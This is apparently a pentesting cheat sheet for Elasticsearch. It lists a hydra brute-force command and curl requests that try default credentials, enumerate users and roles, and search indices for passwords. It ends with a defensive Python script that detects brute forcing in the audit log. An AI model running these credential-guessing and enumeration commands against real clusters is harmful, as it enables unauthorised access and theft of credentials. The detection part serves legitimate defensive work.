Elasticsearch Pentesting
Last modified: 2023-02-05
Web
Elasticsearch is a search engine built on the Lucene library. Default ports are 9200 (HTTP API) and 9300 (transport).
Enumeration
Brute Force Credentials
Brute-force the credentials sent in the HTTP "Authorization" header of the web interface.
hydra -L usernames.txt -P passwords.txt <target-ip> -s 9200 http-get /
Access over HTTP
Elasticsearch exposes its REST API over HTTP, so every endpoint below can be queried with curl. The requests are plain GETs, so curl needs no -X flag (passing a URL as the argument to -X is a syntax error).
# Basic
curl http://10.0.0.1:9200/
# Default credentials
curl http://admin:elasticadmin@10.0.0.1:9200/
curl http://elastic:changeme@10.0.0.1:9200/
# User and role enumeration (the _xpack path is the legacy form of _security)
curl http://10.0.0.1:9200/_security/role
curl http://10.0.0.1:9200/_security/user
curl http://10.0.0.1:9200/_xpack/security/user
# Search all indices for interesting field values
curl http://10.0.0.1:9200/_search?q=username
curl http://10.0.0.1:9200/_search?q=password
# Others
curl http://10.0.0.1:9200/_cat/
curl http://10.0.0.1:9200/_cluster/
curl http://10.0.0.1:9200/_nodes/
curl http://10.0.0.1:9200/_remote/
curl http://10.0.0.1:9200/_security/
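On the defending side, the brute-force and default-credential attempts above show up as authentication_failed events in Elasticsearch's JSON audit log. The following script is an added example (not part of the original page) that flags any source address producing a burst of such failures; the audit-log field names are assumed to match the Elasticsearch audit log format, and the sample log lines are constructed.

```python
"""Flag credential brute forcing against Elasticsearch from its JSON audit log.
Audit logging is enabled with `xpack.security.audit.enabled: true`; each event
is one JSON object per line. Field names follow the Elasticsearch JSON audit
log format (assumed here; verify them against your version's documentation)."""
import json
from collections import defaultdict
from datetime import datetime, timedelta


def _parse_ts(ts):
    # e.g. 2023-02-05T10:00:04,000Z: swap the comma for a dot, drop the zone
    return datetime.strptime(ts[:23].replace(",", "."), "%Y-%m-%dT%H:%M:%S.%f")


def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {source_ip: {"failures": total, "users": [...]}} for each source
    with at least `threshold` authentication failures inside one sliding window."""
    failures = defaultdict(list)  # source ip -> [(time, attempted user)]
    for line in filter(None, log_text.splitlines()):
        ev = json.loads(line)
        if ev.get("event.action") != "authentication_failed":
            continue
        src = ev.get("origin.address", "?").rsplit(":", 1)[0]  # strip the port
        failures[src].append((_parse_ts(ev["@timestamp"]), ev.get("user.name", "?")))

    alerts = {}
    for src, hits in failures.items():
        hits.sort()
        times = [t for t, _ in hits]
        for i, start in enumerate(times):
            inside = sum(1 for t in times[i:] if t - start <= window)
            if inside >= threshold:  # `threshold` failures within `window`
                alerts[src] = {"failures": len(hits),
                               "users": sorted({u for _, u in hits})}
                break
    return alerts


# Constructed sample: 10.0.0.5 cycles through usernames within 20 seconds (the
# hydra pattern from above); 10.0.0.9 fails once and must not be flagged.
SAMPLE_AUDIT_LOG = "\n".join(
    json.dumps({"@timestamp": f"2023-02-05T10:00:{s:02d},000Z",
                "event.action": "authentication_failed", "url.path": "/",
                "origin.address": f"{ip}:40001", "user.name": u,
                "request.method": "GET"})
    for s, ip, u in [(0, "10.0.0.5", "elastic"), (4, "10.0.0.5", "admin"),
                     (8, "10.0.0.5", "kibana"), (12, "10.0.0.5", "root"),
                     (16, "10.0.0.5", "elastic"), (30, "10.0.0.9", "alice")])
```

Run it against a real audit file with `detect_bruteforce(open(path).read())`; a hit that lists many distinct user names from one address is the dictionary-attack signature.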